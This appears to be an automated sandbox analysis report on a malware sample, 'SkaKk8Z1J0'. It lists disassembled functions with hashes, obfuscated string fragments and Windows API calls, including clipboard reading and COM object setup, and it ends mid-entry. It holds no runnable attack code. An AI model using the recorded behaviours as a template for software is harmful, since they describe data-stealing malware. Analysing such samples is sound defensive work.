                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: $!$"$$$%$%$&$($)$*$+$,$-$.$.$.$0$0$1$2$4$4$4$5$6$8$:$;$;$<$=$>$>$?$?$@$B$C$D$D$F$H$J$L$M$N$N$N$O$P$R$T$U$V$X$Z$Z$Z$[$\$\$]$^$^$`$a$b$c$d$e$e$e$e$f$g$h$i$i$j$k$l$l$m$n$o$p$p$r$s$t$t$t$v$v$x$x$z$|$}$~$~$~
                                                                                                                                                                                                                                                  • API String ID: 0-1394229784
                                                                                                                                                                                                                                                  • Opcode ID: 0ad0ccab371ecf03d36c413c93bc7494f07a7df5888065dda6a46f4b89f4694b
                                                                                                                                                                                                                                                  • Instruction ID: ef8ec4e7412bcb3c4d2042d4cbbe8fb9745bb5d183b843aa2fe4d516801966e4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ad0ccab371ecf03d36c413c93bc7494f07a7df5888065dda6a46f4b89f4694b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8922582190C7E9CDEB26C638CC587DDBEA15B56314F0841D9C19D6B3C2D7BA0B89CB26
                                                                                                                                                                                                                                                  Function 0043462A Relevance: 127.9, Strings: 102, Instructions: 417COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: $!$"$$$%$%$&$($)$*$+$,$-$.$.$.$0$0$1$2$4$4$4$5$6$8$:$;$;$<$=$>$>$?$?$@$B$C$D$D$F$H$J$L$M$N$N$N$O$P$R$T$U$V$X$Z$Z$Z$[$\$\$]$^$^$`$a$b$c$d$e$e$e$e$f$g$h$i$i$j$k$l$l$m$n$o$p$p$r$s$t$t$t$v$v$x$x$z$|$}$~$~$~
                                                                                                                                                                                                                                                  • API String ID: 0-1394229784
                                                                                                                                                                                                                                                  • Opcode ID: 056a6b09ac1f0b8069d8e0856d928db892cc49fb58976f7f6017e888c085083b
                                                                                                                                                                                                                                                  • Instruction ID: 78fde7a8102a4a25e3d516c1edb5f9b2f063fdb03dbd0bbcca9d4d838a68c62c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 056a6b09ac1f0b8069d8e0856d928db892cc49fb58976f7f6017e888c085083b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F22472190D7E9CDEB26C638CC587DDBEA15B56314F0841D9C19D6B3C2C7BA0B89CB26
                                                                                                                                                                                                                                                  Function 007742FF Relevance: 36.6, Strings: 29, Instructions: 348COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: *$+$0$:$<$>$@$C$`$`$a$b$d$d$f$g$h$n$n$p$s$w$x$z${${$|$|$}
                                                                                                                                                                                                                                                  • API String ID: 0-334816167
                                                                                                                                                                                                                                                  • Opcode ID: 63cdccc75301cd355fa4edc8c506f7aea9a9e61635fb673e26f729942e3a0ac3
                                                                                                                                                                                                                                                  • Instruction ID: 139df2af947e14f4d6ef63707ac1d9d8b0128d4e6ced7c5235369ca90afcf224
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 63cdccc75301cd355fa4edc8c506f7aea9a9e61635fb673e26f729942e3a0ac3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 57F1D321D087E98ADB36C67C88443CDAFA11B53324F1983D8C4E9AB3D2C7780A46CB91
                                                                                                                                                                                                                                                  Function 00434098 Relevance: 36.6, Strings: 29, Instructions: 348COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: *$+$0$:$<$>$@$C$`$`$a$b$d$d$f$g$h$n$n$p$s$w$x$z${${$|$|$}
                                                                                                                                                                                                                                                  • API String ID: 0-334816167
                                                                                                                                                                                                                                                  • Opcode ID: 4d803b101157e4a712cc0ef110f4861eff536f857bbb1a7cf2d313a64b91ceb8
                                                                                                                                                                                                                                                  • Instruction ID: 4ba09c738a8091425718d315f50eff196f5ba60e1b3feeb24fdbf3622366560b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d803b101157e4a712cc0ef110f4861eff536f857bbb1a7cf2d313a64b91ceb8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0BF1E521D087E98ADB32C67C8C443CDBFA15B97324F1943D9D4E9AB3D2C6780A46CB56
                                                                                                                                                                                                                                                  Function 004361E0 Relevance: 32.1, APIs: 10, Strings: 8, Instructions: 636memorycomCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(0043F68C,00000000,00000001,0043F67C), ref: 0043640E
                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(FA46F8B5), ref: 0043646A
                                                                                                                                                                                                                                                  • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004364A7
                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(w!s#), ref: 004364FB
                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(A3q5), ref: 004365A1
                                                                                                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00436613
                                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00436775
                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 004367A0
                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 004367A6
                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004367B3
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: String$AllocFree$Variant$BlanketClearCreateInitInstanceProxy
                                                                                                                                                                                                                                                  • String ID: A;$BC$C$T'g)$X&c8$Y/9Q$w!s#$z7}9A3q5
                                                                                                                                                                                                                                                  • API String ID: 2485776651-4124187736
                                                                                                                                                                                                                                                  • Opcode ID: 1a7a540a913549243f643d940beb1ec8542d667b59db154e60dd983501a017ec
                                                                                                                                                                                                                                                  • Instruction ID: 522da010f1620deffab12e26d595bfb80e0736a5a48a815d81ab8756012ad252
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a7a540a913549243f643d940beb1ec8542d667b59db154e60dd983501a017ec
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7112EC72A083019BD314CF28C881B6BBBE5FFC9304F15992DF595DB290D778D9058B9A
                                                                                                                                                                                                                                                  Function 00776447 Relevance: 28.6, APIs: 8, Strings: 8, Instructions: 636memorycomCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CoCreateInstance.COMBASE(0043F68C,00000000,00000001,0043F67C), ref: 00776675
                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(FA46F8B5), ref: 007766D1
                                                                                                                                                                                                                                                  • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0077670E
                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(w!s#), ref: 00776762
                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(A3q5), ref: 00776808
                                                                                                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 0077687A
                                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 007769DC
                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00776A1A
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: String$Alloc$Variant$BlanketClearCreateFreeInitInstanceProxy
                                                                                                                                                                                                                                                  • String ID: A;$BC$C$T'g)$X&c8$Y/9Q$w!s#$z7}9A3q5
                                                                                                                                                                                                                                                  • API String ID: 2775254435-4124187736
                                                                                                                                                                                                                                                  • Opcode ID: 7f006d42d978ea279f5d884ff5246a5058d7d597c52cd245997dba74b9415a56
                                                                                                                                                                                                                                                  • Instruction ID: 22f7b8ffb99ad2a0f3a03d783ccc72c7c27f50f28588226b61ecdaf57ad1ebe7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7f006d42d978ea279f5d884ff5246a5058d7d597c52cd245997dba74b9415a56
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0512CBB26083409BD714CF28C885B6BBBE6FBC5344F14892CE699DB295D778D9058B82
                                                                                                                                                                                                                                                  Function 004310D0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 114clipboardCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                                  • String ID: ($P$W$]$j$x
                                                                                                                                                                                                                                                  • API String ID: 2832541153-1642767450
                                                                                                                                                                                                                                                  • Opcode ID: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
                                                                                                                                                                                                                                                  • Instruction ID: d10a51e23ecba45016217ad21913f42ff9d133ebe453f27826f30668db2baec2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B941A17050C7818ED301AFB8D88835FBEE0AB8A314F444A7EE4E9963D2D678854DC797
                                                                                                                                                                                                                                                  Function 00749497 Relevance: 18.0, Strings: 14, Instructions: 458COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 7]7N$9/,8$; >?$<'=0$LSJm$PVNR$R:e}$`{R2$agsy$p~rs$rz|x$sD/f$wkoq$~p~9
                                                                                                                                                                                                                                                  • API String ID: 0-2345621967
                                                                                                                                                                                                                                                  • Opcode ID: a9be2e0f6340cc52a81f7dbe1f742bb92054bc815233c9bebfa9ac53ecd4af8d
                                                                                                                                                                                                                                                  • Instruction ID: 0d6f173f80f7c16c0ab42a03589e39256049439c04bcc0f2f75ddd01a04b51d3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a9be2e0f6340cc52a81f7dbe1f742bb92054bc815233c9bebfa9ac53ecd4af8d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3DC1487150C3958BD316CF2584A076BBFE1AFD2344F1889ACE4E11B786D73D890ACB66
                                                                                                                                                                                                                                                  Function 00409230 Relevance: 18.0, Strings: 14, Instructions: 458COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 7]7N$9/,8$; >?$<'=0$LSJm$PVNR$R:e}$`{R2$agsy$p~rs$rz|x$sD/f$wkoq$~p~9
                                                                                                                                                                                                                                                  • API String ID: 0-2345621967
                                                                                                                                                                                                                                                  • Opcode ID: a9be2e0f6340cc52a81f7dbe1f742bb92054bc815233c9bebfa9ac53ecd4af8d
                                                                                                                                                                                                                                                  • Instruction ID: bfc0c3310975af71fded0e8a17bd930ed1ccefcf7fefaebca231936fe6ab8075
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a9be2e0f6340cc52a81f7dbe1f742bb92054bc815233c9bebfa9ac53ecd4af8d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47C1367150C3958BD315CE2584A036BBFE1AFD6304F1889BDE4E11B386D63D8D0ACBA6
                                                                                                                                                                                                                                                  Function 0074FC64 Relevance: 17.1, Strings: 13, Instructions: 892COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: &$+$4$@$C$O$T$Y$Z$\$g$q$t
                                                                                                                                                                                                                                                  • API String ID: 0-2174627302
                                                                                                                                                                                                                                                  • Opcode ID: 2c149d579c2bfbe290bb8fc034ca28ef72b0ce807b879de6ec01245955241a86
                                                                                                                                                                                                                                                  • Instruction ID: d24f768fc7ff122535fdb9289371a65f1a71abec50e123608e0fe608babae737
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2c149d579c2bfbe290bb8fc034ca28ef72b0ce807b879de6ec01245955241a86
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A729F7160C7808FD3249F38C4993AEBBE1ABD6314F19892ED9DA87392D7798445CB43
                                                                                                                                                                                                                                                  Function 0040F9FD Relevance: 17.1, Strings: 13, Instructions: 892COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: &$+$4$@$C$O$T$Y$Z$\$g$q$t
                                                                                                                                                                                                                                                  • API String ID: 0-2174627302
                                                                                                                                                                                                                                                  • Opcode ID: f52dced1cf65a414ee24cc6989a8964ae525b4ff9d6317fe5288a1117d325355
                                                                                                                                                                                                                                                  • Instruction ID: 9695cd9248a7320cbd761fb78df0a02734abf8995342c504889e395b39462be9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f52dced1cf65a414ee24cc6989a8964ae525b4ff9d6317fe5288a1117d325355
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E728E7160C7818BD3249F38C4953AFBBE2ABD5314F194A3EE5D9873D2D67884858B07
                                                                                                                                                                                                                                                  Function 00768108 Relevance: 14.2, Strings: 11, Instructions: 461COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: *B)$*B)$<=$O)O+$Q5Z7$T!M#$U1D3$V%G'$XY$\9X;$p-B/
                                                                                                                                                                                                                                                  • API String ID: 0-898000180
                                                                                                                                                                                                                                                  • Opcode ID: 9fc2874815f84d3ef4346084d008133ae0ec9231113661370af9e7ee02782906
                                                                                                                                                                                                                                                  • Instruction ID: 234258608b1e275d58fda38ee3c6e27ec7bcadf267e3d85f53117b7ddb29742c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9fc2874815f84d3ef4346084d008133ae0ec9231113661370af9e7ee02782906
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 12C10EB12483518BD714CF19C89266BB7B2EFD2714F088A5CE8D68B394E7388902C796
                                                                                                                                                                                                                                                  Function 00763C9B Relevance: 10.4, Strings: 8, Instructions: 446COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 4%$>V$>V$<>$EG$IK$UW$|~
                                                                                                                                                                                                                                                  • API String ID: 0-2246970021
                                                                                                                                                                                                                                                  • Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                  • Instruction ID: 98f3ea6024201efb8f127dc5619669818b95bbd84f260d196a40dfcdbe7983ad
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 983242B0601B469FDB48CF26D580389BBB1FF45300F548698C9695FB5ADB35A8A2CFC0
                                                                                                                                                                                                                                                  Function 00423A34 Relevance: 10.4, Strings: 8, Instructions: 446COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 4%$>V$>V$<>$EG$IK$UW$|~
                                                                                                                                                                                                                                                  • API String ID: 0-2246970021
                                                                                                                                                                                                                                                  • Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                  • Instruction ID: f89536dd89445c36d0748b7bd4a9cf4b738649ea5c65e76590e6169531de8307
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C43242B0611B569FDB48CF26D580389BBB1FF45300F548698C9695FB4ADB35A8A2CFC0
                                                                                                                                                                                                                                                  Function 00425E90 Relevance: 9.4, APIs: 1, Strings: 4, Instructions: 648COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: *mB$67$@iB$V3R5
                                                                                                                                                                                                                                                  • API String ID: 0-119712241
                                                                                                                                                                                                                                                  • Opcode ID: 2752cfb5aefe83a77e1e275bbb3611267d68b1f03f1cd38cb6bb80b62f128883
                                                                                                                                                                                                                                                  • Instruction ID: f8f986030c5c516667fa2fb6bcf2798bb7f33b75dff4277953ef0512ab11a316
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2752cfb5aefe83a77e1e275bbb3611267d68b1f03f1cd38cb6bb80b62f128883
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A2258716083548BC728DF68E85176FB7E1EFC5304F49893DE9868B392EB349905CB86
                                                                                                                                                                                                                                                  Function 00761347 Relevance: 8.0, Strings: 6, Instructions: 536COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: !@$,$T$U$V$h
                                                                                                                                                                                                                                                  • API String ID: 0-1072848446
                                                                                                                                                                                                                                                  • Opcode ID: 8e8ca45835480ccfa162dc2bafbba4cee2664ffe78ab865597f6f2298b61ffbe
                                                                                                                                                                                                                                                  • Instruction ID: 34e6821f18388567efca40b3c3dfcad7d723317e0f4a272f3844168d1cd51de4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e8ca45835480ccfa162dc2bafbba4cee2664ffe78ab865597f6f2298b61ffbe
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3722907160C7908FD320CF78C45936EBBE1AB86314F598A2DE9D687392D7799844CB43
                                                                                                                                                                                                                                                  Function 004210E0 Relevance: 8.0, Strings: 6, Instructions: 536COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: !@$,$T$U$V$h
                                                                                                                                                                                                                                                  • API String ID: 0-1072848446
                                                                                                                                                                                                                                                  • Opcode ID: b818ee9c67694a0f4bc9b807532e0d54e79f31c8e805177f741268a403b11b31
                                                                                                                                                                                                                                                  • Instruction ID: 7f4f8c271271a0ee30063bf5d57d9afa0b4a7bb7edff0777766b2e5d54dfe869
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b818ee9c67694a0f4bc9b807532e0d54e79f31c8e805177f741268a403b11b31
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CF22E17160C3A08FD320DF28D44436FBBE1ABD6314F598A2EE5D9873A1D77988458B4B
                                                                                                                                                                                                                                                  Function 004205B0 Relevance: 8.0, Strings: 6, Instructions: 481COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: &'$0c=e$2g1i$<k;m$B$wy
                                                                                                                                                                                                                                                  • API String ID: 0-2430453506
                                                                                                                                                                                                                                                  • Opcode ID: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                  • Instruction ID: efc43d6a55d29c5113b9513135886848320c4b4fba7a0b6b3d57c2edb9ba0087
